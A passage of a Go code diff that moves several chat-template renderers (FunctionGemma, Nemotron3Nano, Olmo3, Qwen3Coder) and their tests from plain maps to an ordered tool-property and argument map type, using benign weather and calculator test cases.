|
||||
},
|
||||
},
|
||||
|
|
@ -860,12 +860,12 @@ Where:
|
|||
Description: "Get current weather information",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "City name",
|
||||
},
|
||||
},
|
||||
}),
|
||||
Required: []string{"location"},
|
||||
},
|
||||
},
|
||||
|
|
@ -877,12 +877,12 @@ Where:
|
|||
Description: "Perform mathematical calculations",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"expression": {
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "Mathematical expression to evaluate",
|
||||
},
|
||||
},
|
||||
}),
|
||||
Required: []string{"expression"},
|
||||
},
|
||||
},
|
||||
|
|
@ -927,12 +927,12 @@ Where:
|
|||
Description: "Get current weather information",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "City name",
|
||||
},
|
||||
},
|
||||
}),
|
||||
Required: []string{"location"},
|
||||
},
|
||||
},
|
||||
|
|
|
|||
|
|
@ -136,7 +136,7 @@ func (r *FunctionGemmaRenderer) renderToolDeclaration(tool api.Tool) string {
|
|||
needsComma := false
|
||||
|
||||
// Only include properties:{} if there are actual properties
|
||||
if len(fn.Parameters.Properties) > 0 {
|
||||
if fn.Parameters.Properties != nil && fn.Parameters.Properties.Len() > 0 {
|
||||
sb.WriteString("properties:{")
|
||||
r.writeProperties(&sb, fn.Parameters.Properties)
|
||||
sb.WriteString("}")
|
||||
|
|
@ -172,16 +172,16 @@ func (r *FunctionGemmaRenderer) renderToolDeclaration(tool api.Tool) string {
|
|||
return sb.String()
|
||||
}
|
||||
|
||||
func (r *FunctionGemmaRenderer) writeProperties(sb *strings.Builder, props map[string]api.ToolProperty) {
|
||||
keys := make([]string, 0, len(props))
|
||||
for k := range props {
|
||||
func (r *FunctionGemmaRenderer) writeProperties(sb *strings.Builder, props *api.ToolPropertiesMap) {
|
||||
keys := make([]string, 0, props.Len())
|
||||
for k := range props.All() {
|
||||
keys = append(keys, k)
|
||||
}
|
||||
sort.Strings(keys)
|
||||
|
||||
first := true
|
||||
for _, name := range keys {
|
||||
prop := props[name]
|
||||
prop, _ := props.Get(name)
|
||||
if !first {
|
||||
sb.WriteString(",")
|
||||
}
|
||||
|
|
@ -203,15 +203,15 @@ func (r *FunctionGemmaRenderer) formatToolCall(tc api.ToolCall) string {
|
|||
var sb strings.Builder
|
||||
sb.WriteString("<start_function_call>call:" + tc.Function.Name + "{")
|
||||
|
||||
keys := make([]string, 0, len(tc.Function.Arguments))
|
||||
for k := range tc.Function.Arguments {
|
||||
keys := make([]string, 0, tc.Function.Arguments.Len())
|
||||
for k := range tc.Function.Arguments.All() {
|
||||
keys = append(keys, k)
|
||||
}
|
||||
sort.Strings(keys)
|
||||
|
||||
first := true
|
||||
for _, key := range keys {
|
||||
value := tc.Function.Arguments[key]
|
||||
value, _ := tc.Function.Arguments.Get(key)
|
||||
if !first {
|
||||
sb.WriteString(",")
|
||||
}
|
||||
|
|
|
|||
|
|
@ -51,9 +51,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
|||
Description: "Get weather",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -75,9 +75,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
|||
Description: "Get weather",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -107,9 +107,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
|||
Description: "Get weather",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -126,7 +126,7 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{"city": "Paris"},
|
||||
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -141,9 +141,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
|||
Description: "Get weather",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -161,7 +161,7 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{"city": "Paris"},
|
||||
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -176,9 +176,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
|||
Description: "Get weather",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -195,7 +195,7 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "add",
|
||||
Arguments: api.ToolCallFunctionArguments{"a": float64(1), "b": float64(2)},
|
||||
Arguments: testArgs(map[string]any{"a": float64(1), "b": float64(2)}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -210,10 +210,10 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
|||
Description: "Add numbers",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"a": {Type: api.PropertyType{"number"}},
|
||||
"b": {Type: api.PropertyType{"number"}},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -239,10 +239,10 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
|||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Required: []string{"city"},
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"city": {Type: api.PropertyType{"string"}, Description: "City Name"},
|
||||
"country": {Type: api.PropertyType{"string"}, Description: "Country Name"},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -263,9 +263,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
|||
Description: "Get weather",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -276,9 +276,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
|||
Description: "Get current time",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"timezone": {Type: api.PropertyType{"string"}, Description: "Timezone"},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -296,13 +296,13 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{"city": "Paris"},
|
||||
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||
},
|
||||
},
|
||||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_time",
|
||||
Arguments: api.ToolCallFunctionArguments{"timezone": "UTC"},
|
||||
Arguments: testArgs(map[string]any{"timezone": "UTC"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -318,9 +318,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
|||
Description: "Get weather",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -331,9 +331,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
|||
Description: "Get current time",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"timezone": {Type: api.PropertyType{"string"}, Description: "Timezone"},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -351,7 +351,7 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{"city": "Paris"},
|
||||
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -367,9 +367,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
|||
Description: "Get weather",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -391,7 +391,7 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
|||
Description: "",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{},
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -430,7 +430,7 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "set_flag",
|
||||
Arguments: api.ToolCallFunctionArguments{"enabled": true},
|
||||
Arguments: testArgs(map[string]any{"enabled": true}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -445,9 +445,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
|||
Description: "Set a flag",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"enabled": {Type: api.PropertyType{"boolean"}, Description: "Flag value"},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -468,11 +468,11 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
|||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Required: []string{"a", "b", "c"},
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"a": {Type: api.PropertyType{"string"}, Description: "A"},
|
||||
"b": {Type: api.PropertyType{"string"}, Description: "B"},
|
||||
"c": {Type: api.PropertyType{"string"}, Description: "C"},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -492,9 +492,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
|||
Description: "Test",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"items": {Type: api.PropertyType{"array"}, Description: "List of items"},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
|
|||
|
|
@ -114,7 +114,7 @@ func (r *Nemotron3NanoRenderer) renderTools(tools []api.Tool) string {
|
|||
|
||||
sb.WriteString("\n<parameters>")
|
||||
if fn.Parameters.Properties != nil {
|
||||
for paramName, paramFields := range fn.Parameters.Properties {
|
||||
for paramName, paramFields := range fn.Parameters.Properties.All() {
|
||||
sb.WriteString("\n<parameter>")
|
||||
sb.WriteString("\n<name>" + paramName + "</name>")
|
||||
|
||||
|
|
@ -202,7 +202,7 @@ func (r *Nemotron3NanoRenderer) formatContent(content string, truncate bool, add
|
|||
func (r *Nemotron3NanoRenderer) writeToolCalls(sb *strings.Builder, toolCalls []api.ToolCall) {
|
||||
for _, tc := range toolCalls {
|
||||
sb.WriteString("<tool_call>\n<function=" + tc.Function.Name + ">\n")
|
||||
for name, value := range tc.Function.Arguments {
|
||||
for name, value := range tc.Function.Arguments.All() {
|
||||
sb.WriteString("<parameter=" + name + ">\n" + r.formatArgValue(value) + "\n</parameter>\n")
|
||||
}
|
||||
sb.WriteString("</function>\n</tool_call>\n")
|
||||
|
|
|
|||
|
|
@ -75,9 +75,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
|||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Required: []string{"city"},
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"city": {Type: api.PropertyType{"string"}, Description: "The city name"},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -113,7 +113,7 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"city": "Paris"},
|
||||
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -129,9 +129,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
|||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Required: []string{"city"},
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"city": {Type: api.PropertyType{"string"}, Description: "The city name"},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -171,7 +171,7 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"city": "Paris"},
|
||||
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -185,9 +185,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
|||
Name: "get_weather",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"city": {Type: api.PropertyType{"string"}},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -238,13 +238,13 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"city": "Paris"},
|
||||
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||
},
|
||||
},
|
||||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"city": "London"},
|
||||
Arguments: testArgs(map[string]any{"city": "London"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -259,9 +259,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
|||
Name: "get_weather",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"city": {Type: api.PropertyType{"string"}},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -304,13 +304,13 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
|||
msgs: []api.Message{
|
||||
{Role: "user", Content: "What's the weather in Paris and London? Also, what's 2+2?"},
|
||||
{Role: "assistant", Content: "", Thinking: "I need to check the weather for both cities and calculate 2+2. Let me start with the weather calls.", ToolCalls: []api.ToolCall{
|
||||
{Function: api.ToolCallFunction{Name: "get_weather", Arguments: api.ToolCallFunctionArguments{"city": "Paris"}}},
|
||||
{Function: api.ToolCallFunction{Name: "get_weather", Arguments: api.ToolCallFunctionArguments{"city": "London"}}},
|
||||
{Function: api.ToolCallFunction{Name: "get_weather", Arguments: testArgs(map[string]any{"city": "Paris"})}},
|
||||
{Function: api.ToolCallFunction{Name: "get_weather", Arguments: testArgs(map[string]any{"city": "London"})}},
|
||||
}},
|
||||
{Role: "tool", Content: "Sunny, 22°C", ToolCallID: "call1"},
|
||||
{Role: "tool", Content: "Rainy, 15°C", ToolCallID: "call2"},
|
||||
{Role: "assistant", Content: "", Thinking: "Now I have the weather data. Let me calculate 2+2.", ToolCalls: []api.ToolCall{
|
||||
{Function: api.ToolCallFunction{Name: "calculate", Arguments: api.ToolCallFunctionArguments{"expression": "2+2"}}},
|
||||
{Function: api.ToolCallFunction{Name: "calculate", Arguments: testArgs(map[string]any{"expression": "2+2"})}},
|
||||
}},
|
||||
{Role: "tool", Content: "4", ToolCallID: "call3"},
|
||||
{Role: "assistant", Content: "Based on the weather data, Paris is sunny at 22°C and London is rainy at 15°C. Also, 2+2 equals 4.", Thinking: "Perfect! I have all the information needed to provide a complete answer."},
|
||||
|
|
@ -322,9 +322,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
|||
Name: "get_weather",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"city": {Type: api.PropertyType{"string"}},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -334,9 +334,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
|||
Name: "calculate",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"expression": {Type: api.PropertyType{"string"}},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -389,7 +389,7 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
|||
{
|
||||
Role: "assistant",
|
||||
ToolCalls: []api.ToolCall{
|
||||
{Function: api.ToolCallFunction{Name: "get_user", Arguments: map[string]any{"id": "123"}}},
|
||||
{Function: api.ToolCallFunction{Name: "get_user", Arguments: testArgs(map[string]any{"id": "123"})}},
|
||||
},
|
||||
},
|
||||
{Role: "tool", Content: `{"name": "John", "age": 30, "active": true}`},
|
||||
|
|
@ -401,7 +401,7 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
|||
Name: "get_user",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{"id": {Type: api.PropertyType{"string"}}},
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{"id": {Type: api.PropertyType{"string"}}}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -450,9 +450,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
|||
ToolCalls: []api.ToolCall{
|
||||
{Function: api.ToolCallFunction{
|
||||
Name: "create",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"data": map[string]any{"nested": "value", "count": 42},
|
||||
},
|
||||
}),
|
||||
}},
|
||||
},
|
||||
},
|
||||
|
|
@ -465,7 +465,7 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
|||
Name: "create",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{"data": {Type: api.PropertyType{"object"}}},
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{"data": {Type: api.PropertyType{"object"}}}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -512,7 +512,7 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
|||
{
|
||||
Role: "assistant",
|
||||
ToolCalls: []api.ToolCall{
|
||||
{Function: api.ToolCallFunction{Name: "translate", Arguments: map[string]any{"text": "你好"}}},
|
||||
{Function: api.ToolCallFunction{Name: "translate", Arguments: testArgs(map[string]any{"text": "你好"})}},
|
||||
},
|
||||
},
|
||||
{Role: "tool", Content: "Hello"},
|
||||
|
|
@ -524,9 +524,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
|||
Name: "translate",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"text": {Type: api.PropertyType{"string"}},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
|
|||
|
|
@ -100,8 +100,8 @@ func (r *Olmo3Renderer) Render(messages []api.Message, tools []api.Tool, _ *api.
|
|||
sb.WriteString("(")
|
||||
|
||||
// Get sorted keys for deterministic output
|
||||
keys := make([]string, 0, len(tc.Function.Arguments))
|
||||
for k := range tc.Function.Arguments {
|
||||
keys := make([]string, 0, tc.Function.Arguments.Len())
|
||||
for k := range tc.Function.Arguments.All() {
|
||||
keys = append(keys, k)
|
||||
}
|
||||
sort.Strings(keys)
|
||||
|
|
@ -110,7 +110,8 @@ func (r *Olmo3Renderer) Render(messages []api.Message, tools []api.Tool, _ *api.
|
|||
if k > 0 {
|
||||
sb.WriteString(", ")
|
||||
}
|
||||
value, err := json.Marshal(tc.Function.Arguments[key])
|
||||
val, _ := tc.Function.Arguments.Get(key)
|
||||
value, err := json.Marshal(val)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
|
|
|
|||
|
|
@ -53,9 +53,9 @@ func TestOlmo3Renderer(t *testing.T) {
|
|||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Required: []string{"location"},
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {Type: api.PropertyType{"string"}, Description: "The city"},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -80,9 +80,9 @@ func TestOlmo3Renderer(t *testing.T) {
|
|||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Required: []string{"location"},
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {Type: api.PropertyType{"string"}, Description: "The city"},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -108,9 +108,9 @@ func TestOlmo3Renderer(t *testing.T) {
|
|||
ID: "call_1",
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "San Francisco",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -126,9 +126,9 @@ func TestOlmo3Renderer(t *testing.T) {
|
|||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Required: []string{"location"},
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {Type: api.PropertyType{"string"}, Description: "The city"},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -172,14 +172,14 @@ func TestOlmo3Renderer(t *testing.T) {
|
|||
ID: "call_1",
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"location": "San Francisco"},
|
||||
Arguments: testArgs(map[string]any{"location": "San Francisco"}),
|
||||
},
|
||||
},
|
||||
{
|
||||
ID: "call_2",
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"location": "New York"},
|
||||
Arguments: testArgs(map[string]any{"location": "New York"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -194,9 +194,9 @@ func TestOlmo3Renderer(t *testing.T) {
|
|||
Name: "get_weather",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {Type: api.PropertyType{"string"}},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -227,10 +227,10 @@ func TestOlmo3Renderer(t *testing.T) {
|
|||
ID: "call_1",
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "book_flight",
|
||||
Arguments: map[string]any{
|
||||
"from": "SFO",
|
||||
"to": "NYC",
|
||||
},
|
||||
Arguments: testArgsOrdered([]orderedArg{
|
||||
{"from", "SFO"},
|
||||
{"to", "NYC"},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -243,10 +243,10 @@ func TestOlmo3Renderer(t *testing.T) {
|
|||
Name: "book_flight",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
"from": {Type: api.PropertyType{"string"}},
|
||||
"to": {Type: api.PropertyType{"string"}},
|
||||
},
|
||||
Properties: testPropsOrdered([]orderedProp{
|
||||
{"from", api.ToolProperty{Type: api.PropertyType{"string"}}},
|
||||
{"to", api.ToolProperty{Type: api.PropertyType{"string"}}},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
|
|||
|
|
@ -78,7 +78,7 @@ func TestOlmo3ThinkRenderer(t *testing.T) {
|
|||
ID: "call_1",
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{"location": "San Francisco"},
|
||||
Arguments: testArgs(map[string]any{"location": "San Francisco"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
|
|||
|
|
@ -96,7 +96,7 @@ func (r *Qwen3CoderRenderer) Render(messages []api.Message, tools []api.Tool, _
|
|||
}
|
||||
sb.WriteString("\n<parameters>")
|
||||
|
||||
for name, prop := range tool.Function.Parameters.Properties {
|
||||
for name, prop := range tool.Function.Parameters.Properties.All() {
|
||||
sb.WriteString("\n<parameter>")
|
||||
sb.WriteString("\n<name>" + name + "</name>")
|
||||
|
||||
|
|
@ -147,7 +147,7 @@ func (r *Qwen3CoderRenderer) Render(messages []api.Message, tools []api.Tool, _
|
|||
}
|
||||
for _, toolCall := range message.ToolCalls {
|
||||
sb.WriteString("\n<tool_call>\n<function=" + toolCall.Function.Name + ">")
|
||||
for name, value := range toolCall.Function.Arguments {
|
||||
for name, value := range toolCall.Function.Arguments.All() {
|
||||
valueStr := formatToolCallArgument(value)
|
||||
sb.WriteString("\n<parameter=" + name + ">\n" + valueStr + "\n</parameter>")
|
||||
}
|
||||
|
|
|
|||
|
|
@ -39,9 +39,9 @@ Hello, how are you?<|im_end|>
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"unit": "fahrenheit",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -55,7 +55,7 @@ Hello, how are you?<|im_end|>
|
|||
Description: "Get the current weather in a given location",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Required: []string{"unit"},
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"unit": {Type: api.PropertyType{"string"}, Enum: []any{"celsius", "fahrenheit"}, Description: "The unit of temperature"},
|
||||
// TODO(drifkin): add multiple params back once we have predictable
|
||||
// order via some sort of ordered map type (see
|
||||
|
|
@ -63,7 +63,7 @@ Hello, how are you?<|im_end|>
|
|||
/*
|
||||
"location": {Type: api.PropertyType{"string"}, Description: "The city and state, e.g. San Francisco, CA"},
|
||||
*/
|
||||
},
|
||||
}),
|
||||
},
|
||||
}},
|
||||
},
|
||||
|
|
@ -140,19 +140,19 @@ That sounds nice! What about New York?<|im_end|>
|
|||
{Role: "system", Content: "You are a helpful assistant with access to tools."},
|
||||
{Role: "user", Content: "call double(1) and triple(2)"},
|
||||
